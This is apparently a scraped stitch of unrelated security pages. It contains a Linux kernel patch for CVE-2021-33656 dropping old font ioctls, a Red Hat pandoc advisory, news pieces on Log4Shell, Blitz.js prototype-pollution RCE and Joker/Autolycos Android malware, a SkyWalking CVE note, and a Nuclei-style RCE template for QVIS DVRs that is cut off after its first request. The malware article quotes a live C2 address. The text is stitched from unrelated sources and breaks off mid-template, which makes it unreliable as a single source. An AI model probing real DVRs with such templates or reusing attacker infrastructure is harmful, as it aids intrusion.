When setting font with malicous data by ioctl cmd PIO_FONT,kernel will write memory out of bounds.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307

    From ff2047fb755d4415ec3c70ac799889371151796d Mon Sep 17 00:00:00 2001
    From: Jiri Slaby <jslaby@suse.cz>
    Date: Tue, 5 Jan 2021 13:02:35 +0100
    Subject: vt: drop old FONT ioctls
    
    From: Jiri Slaby <jslaby@suse.cz>
    
    commit ff2047fb755d4415ec3c70ac799889371151796d upstream.
    
    Drop support for these ioctls:
    * PIO_FONT, PIO_FONTX
    * GIO_FONT, GIO_FONTX
    * PIO_FONTRESET
    
    As was demonstrated by commit 90bfdeef83f1 (tty: make FONTX ioctl use
    the tty pointer they were actually passed), these ioctls are not used
    from userspace, as:
    1) they used to be broken (set up font on current console, not the open
       one) and racy (before the commit above)
    2) KDFONTOP ioctl is used for years instead
    
    Note that PIO_FONTRESET is defunct on most systems as VGA_CONSOLE is set
    on them for ages. That turns on BROKEN_GRAPHICS_PROGRAMS which makes
    PIO_FONTRESET just return an error.
    
    We are removing KD_FONT_FLAG_OLD here as it was used only by these
    removed ioctls. kd.h header exists both in kernel and uapi headers, so
    we can remove the kernel one completely. Everyone includeing kd.h will
    now automatically get the uapi one.
    
    There are now unused definitions of the ioctl numbers and "struct
    consolefontdesc" in kd.h, but as it is a uapi header, I am not touching
    these.
    
    Signed-off-by: Jiri Slaby <jslaby@suse.cz>
    Link: https://lore.kernel.org/r/20210105120239.28031-8-jslaby@suse.cz
    Cc: guodaxing <guodaxing@huawei.com>
    Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
    ---
     drivers/tty/vt/vt.c       |   39 -----------
     drivers/tty/vt/vt_ioctl.c |  151 ----------------------------------------------
     include/linux/kd.h        |    8 --
     3 files changed, 3 insertions(+), 195 deletions(-)
     delete mode 100644 include/linux/kd.h
    
    --- a/drivers/tty/vt/vt.c
    +++ b/drivers/tty/vt/vt.c
    @@ -4625,16 +4625,8 @@ static int con_font_get(struct vc_data *
     
     	if (op->data && font.charcount > op->charcount)
     		rc = -ENOSPC;
    -	if (!(op->flags & KD_FONT_FLAG_OLD)) {
    -		if (font.width > op->width || font.height > op->height) 
    -			rc = -ENOSPC;
    -	} else {
    -		if (font.width != 8)
    -			rc = -EIO;
    -		else if ((op->height && font.height > op->height) ||
    -			 font.height > 32)
    -			rc = -ENOSPC;
    -	}
    +	if (font.width > op->width || font.height > op->height)
    +		rc = -ENOSPC;
     	if (rc)
     		goto out;
     
    @@ -4662,7 +4654,7 @@ static int con_font_set(struct vc_data *
     		return -EINVAL;
     	if (op->charcount > 512)
     		return -EINVAL;
    -	if (op->width <= 0 || op->width > 32 || op->height > 32)
    +	if (op->width <= 0 || op->width > 32 || !op->height || op->height > 32)
     		return -EINVAL;
     	size = (op->width+7)/8 * 32 * op->charcount;
     	if (size > max_font_size)
    @@ -4672,31 +4664,6 @@ static int con_font_set(struct vc_data *
     	if (IS_ERR(font.data))
     		return PTR_ERR(font.data);
     
    -	if (!op->height) {		/* Need to guess font height [compat] */
    -		int h, i;
    -		u8 *charmap = font.data;
    -
    -		/*
    -		 * If from KDFONTOP ioctl, don't allow things which can be done
    -		 * in userland,so that we can get rid of this soon
    -		 */
    -		if (!(op->flags & KD_FONT_FLAG_OLD)) {
    -			kfree(font.data);
    -			return -EINVAL;
    -		}
    -
    -		for (h = 32; h > 0; h--)
    -			for (i = 0; i < op->charcount; i++)
    -				if (charmap[32*i+h-1])
    -					goto nonzero;
    -
    -		kfree(font.data);
    -		return -EINVAL;
    -
    -	nonzero:
    -		op->height = h;
    -	}
    -
     	font.charcount = op->charcount;
     	font.width = op->width;
     	font.height = op->height;
    --- a/drivers/tty/vt/vt_ioctl.c
    +++ b/drivers/tty/vt/vt_ioctl.c
    @@ -486,70 +486,6 @@ static int vt_k_ioctl(struct tty_struct
     	return 0;
     }
     
    -static inline int do_fontx_ioctl(struct vc_data *vc, int cmd,
    -		struct consolefontdesc __user *user_cfd,
    -		struct console_font_op *op)
    -{
    -	struct consolefontdesc cfdarg;
    -	int i;
    -
    -	if (copy_from_user(&cfdarg, user_cfd, sizeof(struct consolefontdesc)))
    -		return -EFAULT;
    -
    -	switch (cmd) {
    -	case PIO_FONTX:
    -		op->op = KD_FONT_OP_SET;
    -		op->flags = KD_FONT_FLAG_OLD;
    -		op->width = 8;
    -		op->height = cfdarg.charheight;
    -		op->charcount = cfdarg.charcount;
    -		op->data = cfdarg.chardata;
    -		return con_font_op(vc, op);
    -
    -	case GIO_FONTX:
    -		op->op = KD_FONT_OP_GET;
    -		op->flags = KD_FONT_FLAG_OLD;
    -		op->width = 8;
    -		op->height = cfdarg.charheight;
    -		op->charcount = cfdarg.charcount;
    -		op->data = cfdarg.chardata;
    -		i = con_font_op(vc, op);
    -		if (i)
    -			return i;
    -		cfdarg.charheight = op->height;
    -		cfdarg.charcount = op->charcount;
    -		if (copy_to_user(user_cfd, &cfdarg, sizeof(struct consolefontdesc)))
    -			return -EFAULT;
    -		return 0;
    -	}
    -	return -EINVAL;
    -}
    -
    -static int vt_io_fontreset(struct vc_data *vc, struct console_font_op *op)
    -{
    -	int ret;
    -
    -	if (__is_defined(BROKEN_GRAPHICS_PROGRAMS)) {
    -		/*
    -		 * With BROKEN_GRAPHICS_PROGRAMS defined, the default font is
    -		 * not saved.
    -		 */
    -		return -ENOSYS;
    -	}
    -
    -	op->op = KD_FONT_OP_SET_DEFAULT;
    -	op->data = NULL;
    -	ret = con_font_op(vc, op);
    -	if (ret)
    -		return ret;
    -
    -	console_lock();
    -	con_set_default_unimap(vc);
    -	console_unlock();
    -
    -	return 0;
    -}
    -
     static inline int do_unimap_ioctl(int cmd, struct unimapdesc __user *user_ud,
     		bool perm, struct vc_data *vc)
     {
    @@ -574,29 +510,7 @@ static inline int do_unimap_ioctl(int cm
     static int vt_io_ioctl(struct vc_data *vc, unsigned int cmd, void __user *up,
     		bool perm)
     {
    -	struct console_font_op op;	/* used in multiple places here */
    -
     	switch (cmd) {
    -	case PIO_FONT:
    -		if (!perm)
    -			return -EPERM;
    -		op.op = KD_FONT_OP_SET;
    -		op.flags = KD_FONT_FLAG_OLD | KD_FONT_FLAG_DONT_RECALC;	/* Compatibility */
    -		op.width = 8;
    -		op.height = 0;
    -		op.charcount = 256;
    -		op.data = up;
    -		return con_font_op(vc, &op);
    -
    -	case GIO_FONT:
    -		op.op = KD_FONT_OP_GET;
    -		op.flags = KD_FONT_FLAG_OLD;
    -		op.width = 8;
    -		op.height = 32;
    -		op.charcount = 256;
    -		op.data = up;
    -		return con_font_op(vc, &op);
    -
     	case PIO_CMAP:
                     if (!perm)
     			return -EPERM;
    @@ -605,20 +519,6 @@ static int vt_io_ioctl(struct vc_data *v
     	case GIO_CMAP:
                     return con_get_cmap(up);
     
    -	case PIO_FONTX:
    -		if (!perm)
    -			return -EPERM;
    -
    -		fallthrough;
    -	case GIO_FONTX:
    -		return do_fontx_ioctl(vc, cmd, up, &op);
    -
    -	case PIO_FONTRESET:
    -		if (!perm)
    -			return -EPERM;
    -
    -		return vt_io_fontreset(vc, &op);
    -
     	case PIO_SCRNMAP:
     		if (!perm)
     			return -EPERM;
    @@ -1099,54 +999,6 @@ void vc_SAK(struct work_struct *work)
     
     #ifdef CONFIG_COMPAT
     
    -struct compat_consolefontdesc {
    -	unsigned short charcount;       /* characters in font (256 or 512) */
    -	unsigned short charheight;      /* scan lines per character (1-32) */
    -	compat_caddr_t chardata;	/* font data in expanded form */
    -};
    -
    -static inline int
    -compat_fontx_ioctl(struct vc_data *vc, int cmd,
    -		   struct compat_consolefontdesc __user *user_cfd,
    -		   int perm, struct console_font_op *op)
    -{
    -	struct compat_consolefontdesc cfdarg;
    -	int i;
    -
    -	if (copy_from_user(&cfdarg, user_cfd, sizeof(struct compat_consolefontdesc)))
    -		return -EFAULT;
    -
    -	switch (cmd) {
    -	case PIO_FONTX:
    -		if (!perm)
    -			return -EPERM;
    -		op->op = KD_FONT_OP_SET;
    -		op->flags = KD_FONT_FLAG_OLD;
    -		op->width = 8;
    -		op->height = cfdarg.charheight;
    -		op->charcount = cfdarg.charcount;
    -		op->data = compat_ptr(cfdarg.chardata);
    -		return con_font_op(vc, op);
    -
    -	case GIO_FONTX:
    -		op->op = KD_FONT_OP_GET;
    -		op->flags = KD_FONT_FLAG_OLD;
    -		op->width = 8;
    -		op->height = cfdarg.charheight;
    -		op->charcount = cfdarg.charcount;
    -		op->data = compat_ptr(cfdarg.chardata);
    -		i = con_font_op(vc, op);
    -		if (i)
    -			return i;
    -		cfdarg.charheight = op->height;
    -		cfdarg.charcount = op->charcount;
    -		if (copy_to_user(user_cfd, &cfdarg, sizeof(struct compat_consolefontdesc)))
    -			return -EFAULT;
    -		return 0;
    -	}
    -	return -EINVAL;
    -}
    -
     struct compat_console_font_op {
     	compat_uint_t op;        /* operation code KD_FONT_OP_* */
     	compat_uint_t flags;     /* KD_FONT_FLAG_* */
    @@ -1223,9 +1075,6 @@ long vt_compat_ioctl(struct tty_struct *
     	/*
     	 * these need special handlers for incompatible data structures
     	 */
    -	case PIO_FONTX:
    -	case GIO_FONTX:
    -		return compat_fontx_ioctl(vc, cmd, up, perm, &op);
     
     	case KDFONTOP:
     		return compat_kdfontop_ioctl(up, perm, &op, vc);
    --- a/include/linux/kd.h
    +++ /dev/null
    @@ -1,8 +0,0 @@
    -/* SPDX-License-Identifier: GPL-2.0 */
    -#ifndef _LINUX_KD_H
    -#define _LINUX_KD_H
    -
    -#include <uapi/linux/kd.h>
    -
    -#define KD_FONT_FLAG_OLD		0x80000000	/* Invoked via old interface [compat] */
    -#endif /* _LINUX_KD_H */

CVE-2021-33656: vt-drop-old-font-ioctls.patch « 5.10.127 « releases - kernel/git/stable/stable-queue.git

An update for pandoc is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-24724: cmark-gfm: possible RCE due to integer overflow


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-07-18

Updated:

2022-07-18

**RHSA-2022:5597 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: pandoc security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for pandoc is now available for Red Hat Enterprise Linux 8.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Pandoc is a markdown/markup conversion tool. The version of pandoc in RHEL 8 CRB uses cmark-gfm (GitHub's extended version of the C reference implementation of CommonMark) for parts of its conversion. The update, fixes CVE-2022-24724: an integer overflow in cmark-gfm's table row parsing which may lead to heap memory corruption when parsing tables with more than UINT16\_MAX columns.  

Security Fix(es):  

*   cmark-gfm: possible RCE due to integer overflow (CVE-2022-24724)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat CodeReady Linux Builder for x86\_64 8 x86\_64
*   Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le
*   Red Hat CodeReady Linux Builder for ARM 64 8 aarch64
*   Red Hat CodeReady Linux Builder for IBM z Systems 8 s390x
*   Red Hat CodeReady Linux Builder for x86\_64 - Extended Update Support 8.6 x86\_64
*   Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 8.6 ppc64le
*   Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 8.6 s390x
*   Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 8.6 aarch64

**Fixes**

*   BZ - 2060662 - CVE-2022-24724 cmark-gfm: possible RCE due to integer overflow

**Red Hat CodeReady Linux Builder for x86\_64 8**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

x86\_64

pandoc-2.0.6-6.el8\_6.x86\_64.rpm

SHA-256: f44b71342c5c7f3a770ece689c85a994bdf97c57cc70ef55a9011e2fd476d435

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for Power, little endian 8**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

ppc64le

pandoc-2.0.6-6.el8\_6.ppc64le.rpm

SHA-256: 84d03fc210d86f761afa84a767340c0f8729f5a9a971e40ea9ed10dba79a7b09

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for ARM 64 8**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

aarch64

pandoc-2.0.6-6.el8\_6.aarch64.rpm

SHA-256: 86d0083cef3452381ffd1a9262bc650275a674e38ccadcd6a174d5212d1e7963

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for IBM z Systems 8**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

s390x

pandoc-2.0.6-6.el8\_6.s390x.rpm

SHA-256: 263c5c2ff34a500fdca6e85d0a0974858dba3494b3d456b0a245a11411dd80e4

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for x86\_64 - Extended Update Support 8.6**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

x86\_64

pandoc-2.0.6-6.el8\_6.x86\_64.rpm

SHA-256: f44b71342c5c7f3a770ece689c85a994bdf97c57cc70ef55a9011e2fd476d435

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 8.6**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

ppc64le

pandoc-2.0.6-6.el8\_6.ppc64le.rpm

SHA-256: 84d03fc210d86f761afa84a767340c0f8729f5a9a971e40ea9ed10dba79a7b09

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 8.6**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

s390x

pandoc-2.0.6-6.el8\_6.s390x.rpm

SHA-256: 263c5c2ff34a500fdca6e85d0a0974858dba3494b3d456b0a245a11411dd80e4

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

**Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 8.6**

SRPM

pandoc-2.0.6-6.el8\_6.src.rpm

SHA-256: 65c4438213667862e50a9f5813e04bab137c677fdd76a72cf515c8e3dcd5b7fb

aarch64

pandoc-2.0.6-6.el8\_6.aarch64.rpm

SHA-256: 86d0083cef3452381ffd1a9262bc650275a674e38ccadcd6a174d5212d1e7963

pandoc-common-2.0.6-6.el8\_6.noarch.rpm

SHA-256: e3162c041f0a226d28fa8615ef87e3b64e4f5bc8919affe0a890a265c9b28a6a

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:5597: Red Hat Security Advisory: pandoc security update

Inaugural report from cyber safety panel outlines strengths and weaknesses exposed by momentous security flaw

Inaugural report from cyber safety panel outlines strengths and weaknesses exposed by momentous security flaw

The ‘Log4Shell’ vulnerability in open source library Log4j has reached “endemic” proportions and the aftershock could reverberate for “a decade or longer”, according to a landmark US government report.

The inaugural report by the Cyber Safety Review Board (CSRB) provided 19 recommendations for how organizations and government agencies can bolster their networks and applications against the threat.

The CSRB was established in February 2022 by the Department of Homeland Security (DHS) as mandated by a cybersecurity-focused Executive Order that was signed by President Biden a year earlier.

The public-private initiative is tasked with reviewing serious cybersecurity events and delivering strategic recommendations to government, industry, and the information security community.

**‘Transformational institution’**

The Log4Shell vulnerability, which surfaced in December 2021, offers a potent combination of super-criticality – notching a maximum CVSS severity score of 10 – and enormous attack surface given Log4j’s near-ubiquity in providing Java-based logging to myriad applications.

Secretary of homeland security Alejandro Mayorkas said the CSRB was a “transformational institution that will advance our cyber resilience in unprecedented ways”, and its report will help “strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security”.

Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Centre, said the report was unusual in providing “a comprehensive review of the impact and root causes of a cyber incident so quickly”.

DON’T FORGET TO READ Prototype pollution in Blitz.js leads to remote code execution

The CSRB report (PDF), published on July 14, said “vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.”

The Apache Software Foundation, which maintains Log4j, was praised for its “well-established software development lifecycle” and “for recognizing the criticality of the problem” in quickly issuing patches.

The report also hailed the rapid production of effective guidance, tools, and threat information by vendors and governments.

Further down the supply chain, however, “organizations still struggled to respond to the event, and the hard work of upgrading vulnerable software is far from complete across many organizations”.

Moreover, the event highlighted “security risks unique to the thinly-resourced, volunteer-based open source community”, which the CSRB said needed more support from both public and private sector stakeholders.

**‘Hard to believe’**

The report said the CSRB was “not aware of any significant Log4j-based attacks on critical infrastructure systems”, and that hostile exploitation seemed to have “occurred at lower levels than many experts predicted”.

However, Matt Chiodi, chief trust officer at security vendor Cerby, found these claims “very hard to believe”, noting that – as the CSRB itself acknowledged – organizations are not obliged to report exploitation of serious vulnerabilities.

Read more of the latest Log4j vulnerability news and analysis

Chiodi also said the recommendations, which among other things cover mitigating ongoing Log4j risks and migrating to a proactive vulnerability management model, “are too opaque for companies to implement in their current form”.

He advised organizations to get “deadly serious about knowing your assets and moving toward a zero-trust architecture”, noting that “most organizations have terrible asset management practices”, particularly in relation to “homegrown applications in the cloud”.

Mackey, meanwhile, cautioned against “reliance on a commercial vendor to alert consumers of a problem presumes that the vendor is properly managing their usage of open source and that they are able to identify and alert all users of their impacted software – even if support for that software has ended.”

With this in mind, “software consumers should implement a trust-but-verify model to validate whether the software they’re given doesn’t contain unpatched vulnerabilities”.

RELATED Bug Alert launched to provide early warning system for super-critical vulnerabilities

‘Endemic’ Log4j bug set to persist in the wild for at least a decade, US government warns 

Chain of exploits could be triggered without any authentication

Chain of exploits could be triggered without any authentication

Blitz.js, a JavaScript web application framework, has patched a dangerous prototype pollution vulnerability that could lead to remote code execution (RCE) on Node.js servers.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

The new bug, discovered and reported by researchers at Sonar, allowed attackers to manipulate the code in the Blitz.js app to create a reverse shell and run arbitrary commands on the server.

**Prototype vulnerability in dependencies**

“Blitz.js is an upcoming JS framework that gained traction on GitHub,” Paul Gerste, vulnerability researcher at Sonar, told _The Daily Swig_. “We selected it in order to help secure its code base and study real-world vulnerabilities.”

Blitz is built on top of Next.js, a React-based framework, and adds components to turn it into a full-stack web development platform.

**DEEP DIVES** Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications

One of the advertised features of Blitz.js is its ‘Zero-API’ layer, which allows the client to invoke server-side business logic through simple functions without the need to write API code.

Blitz.js makes an RPC call to the server in the background and returns the response to the client function call.

“Blitz.js adds an RPC layer on top of Next.js (among other features), and that layer uses superjson to deserialize data from incoming requests. The vulnerability is entirely inside of superjson,” Gerste said.

As an extended version of JSON, superjson adds support for dates, regexes, and circular dependencies. The circular dependency feature allows JSON specifications to reference property names, which caused the prototype vulnerability. An attacker could use these property names to change the running code on the server.

**RCE on Blitz servers**

Gerste discovered a chain of exploits that could be triggered through the prototype pollution vulnerability and lead to RCE.

First, a polluted JSON request is sent to the server, which triggers the routing mechanism of Blitz.js to load a JavaScript file with the polluted prototype. This allows the attacker to use the malicious JavaScript object to execute arbitrary code.

Read more of the latest infosec research news

Ideally, an attacker would create and run a file on the server. But Blitz.js does not support upload functionality. However, it has a CLI wrapper script that uses JavaScript’s function to launch a new process.

The attacker could use this function to launch a CLI process and run an arbitrary command on the server.

  
  
Prototype pollution in Blitz.js (Image: sonarsource.com)

What makes this vulnerability especially dangerous is that it can be triggered without any authentication, which means any user who can access the Blitz.js application will be able to launch RCE attacks.

“An attacker would have the same level of privilege as the vulnerable application,” Gerste said. “So, if the application runs as root, the attacker would also have root privileges.”

**Complicated bug**

Prototype pollution bugs often act in very complicated ways. For example, in the case of Blitz.js, the CLI wrapper object was not vulnerable per se but could be abused by the prototype pollution bug.

“This attack technique leverages a code pattern that isn’t a vulnerability in itself,” Gerste said. “Prototype pollution can influence the target application in a very invasive way, and it would require a lot of work to get rid of all code that could be influenced by prototype pollution.”

In his write-up of the bug, Gerste gives some general recommendations that can harden JavaScript apps against prototype pollution, including freezing or using the flag in Node.js.

“I think prototype pollution is still unknown to many JavaScript developers,” Gerste said. “I don’t see developers use the patterns that we recommended in our article very often. With our blog posts, we try to help educate JavaScript developers and share this knowledge.”

**YOU MIGHT ALSO LIKE** Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

Prototype pollution in Blitz.js leads to remote code execution

Google removed eight Android apps, with 3M cumulative downloads, from its marketplace for being infected with a Joker spyware variant.

Google removed eight Android apps, with 3M cumulative downloads, from its marketplace for being infected with a Joker spyware variant.

Google has removed eight apps from its Google Play store that were propagating a new variant of the Joker spyware, but not before they already had garnered more than 3 million downloads.

French security researcher Maxime Ingrao of cybersecurity firm Evina discovered a malware that he dubbed Autolycos that can subscribe users to a premium service as well as access users’ SMS messages,. according to a post he made on Twitter last week. This type of malware–in which malicious applications subscribe users to premium services without their knowledge or consent to rack up payment charges–is called toll fraud malware, or more commonly, fleeceware.

_\[**FREE On-demand Event**: **Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **WATCH HERE**.\]_

Ingrao said he discovered eight applications on the site spreading Autolycos since June 2021 that had racked up several million downloads. The cybercriminals behind Autolycos are using Facebook pages and running ads on Facebook and Instagram to promote the malware, he said.

“For example, there were 74 ad campaigns for Razer Keyboard & Theme malware,” Ingrao tweeted in one of a series of follow-up posts describing how the malware works.

****Joker Rides Again****

Ingrao compared the malware to Joker, a spyware discovered in 2019 that also secretly subscribed people to premium services and stole SMS messages, among other nefarious activities.

Indeed, upon further examination, researchers from Malwarebytes believe the malware is a new variant of Joker–what Malwarebytes refers to as “Android/Trojan.Spy.Joker–Malwarebytes intelligence researcher Pieter Artnz said in a post published a day after Ingrao’s revelation.

Joker was the first major malware families hat specialized in in fleeceware, according to Malwarebytes. The trojan would hide in the advertisement frameworks utilized by the malicious apps propagating it; these frameworks aggregate and serve in-app ads.

After the apps with Joker were installed, they would show a “splash” screen, which would display the app logo, to throw off victims while performing various malicious processes in the background, such as stealing SMSes and contact lists as well as performing ad fraud and signing people up for subscriptions without their knowledge.

****Difference in Execution****

One difference between the original Joker and Autolycos, however, was pointed out by Ingrao.”No webview like #Joker but only http requests,” he tweeted.

“It retrieves a JSON (Java Script Object Notation) on the C2 address: 68.183.219.190/pER/y,” Ingrao said of Autolycos in a tweet. “It then executes the URLs, for some steps it executes the URLs on a remote browser and returns the result to include it in the requests.”

Malwarebytes’ Artnz also explained this difference further in his post. While Joker used webviews—or a piece of Web content, such as “a tiny part of the app screen, a whole page, or anything in between”—to do its dirty week, Autolycos avoids this by executing URLs on a remote browser and then including the result in HTTP requests, he wrote.

This helps Autolycos evade detection even more adeptly than the original Joker, according to Malwarebytes’ Artnz said. “Not requiring a WebView greatly reduces the chances that the user of an affected device notices something fishy is going on,” he wrote.

****Lag Time in Discovery and App Removal****

The eight apps in which Ingrao discovered Autolycos are:

*   Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads
*   Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads
*   Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads
*   Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads
*   Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads
*   Coco Camera v1.1 (com.toomore.cool.camera) –  1,000 downloads
*   Funny Camera by KellyTech –  500,000 downloads
*   Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads.

While Ingrao discovered the offending apps in July 2021 and reported them to Google quickly, he told BleepingComputer that the company took six months to remove six of the apps. Moreover, Google only finally removed the last two on July 13, according to Malwarebytes.

Artnz was critical of the lag time between discovery and removal, though he did not speculate as to the reason why, noting only that “the small footprint and masked usage of APIs must make it hard to find malicious apps among the multitude of apps that can be found in the Google Play Store.”

“It’s possible \[the malicious apps\] would still be available if the researcher hadn’t gone public because he said he got tired of waiting,” Artnz wrote.

Google did not immediately respond to request for comment on Monday. Indeed, the company has a storied history of struggling to keep malicious apps—in particular fleeceware-\-off its mobile app store for the Android platform.

_\[**FREE On-demand Event**: **Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **WATCH HERE**.\]_

Google Boots Multiple Malware-laced Android Apps from Marketplace

A vulnerability in Apache SkyWalking NodeJS Agent prior to 0.5.1. The vulnerability will cause NodeJS services that has this agent installed to be unavailable if the OAP is unhealthy and NodeJS agent can't establish the connection.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-36127

QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.

id: qvisdvr-deserialization-rce

info:

name: QVISDVR JSF Deserialization - Remote Code Execution

author: me9187

severity: critical

description: |

QVISDVR Java-Deserialization was discovered, which could allow remote code execution.

reference:

\- https://twitter.com/Me9187/status/1414606876575162373

classification:

cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

cvss-score: 10.0

cwe-id: CWE-77

tags: qvisdvr,rce,deserialization,jsf,iot

requests:

\- raw:

\- |

GET /qvisdvr/ HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

\- |

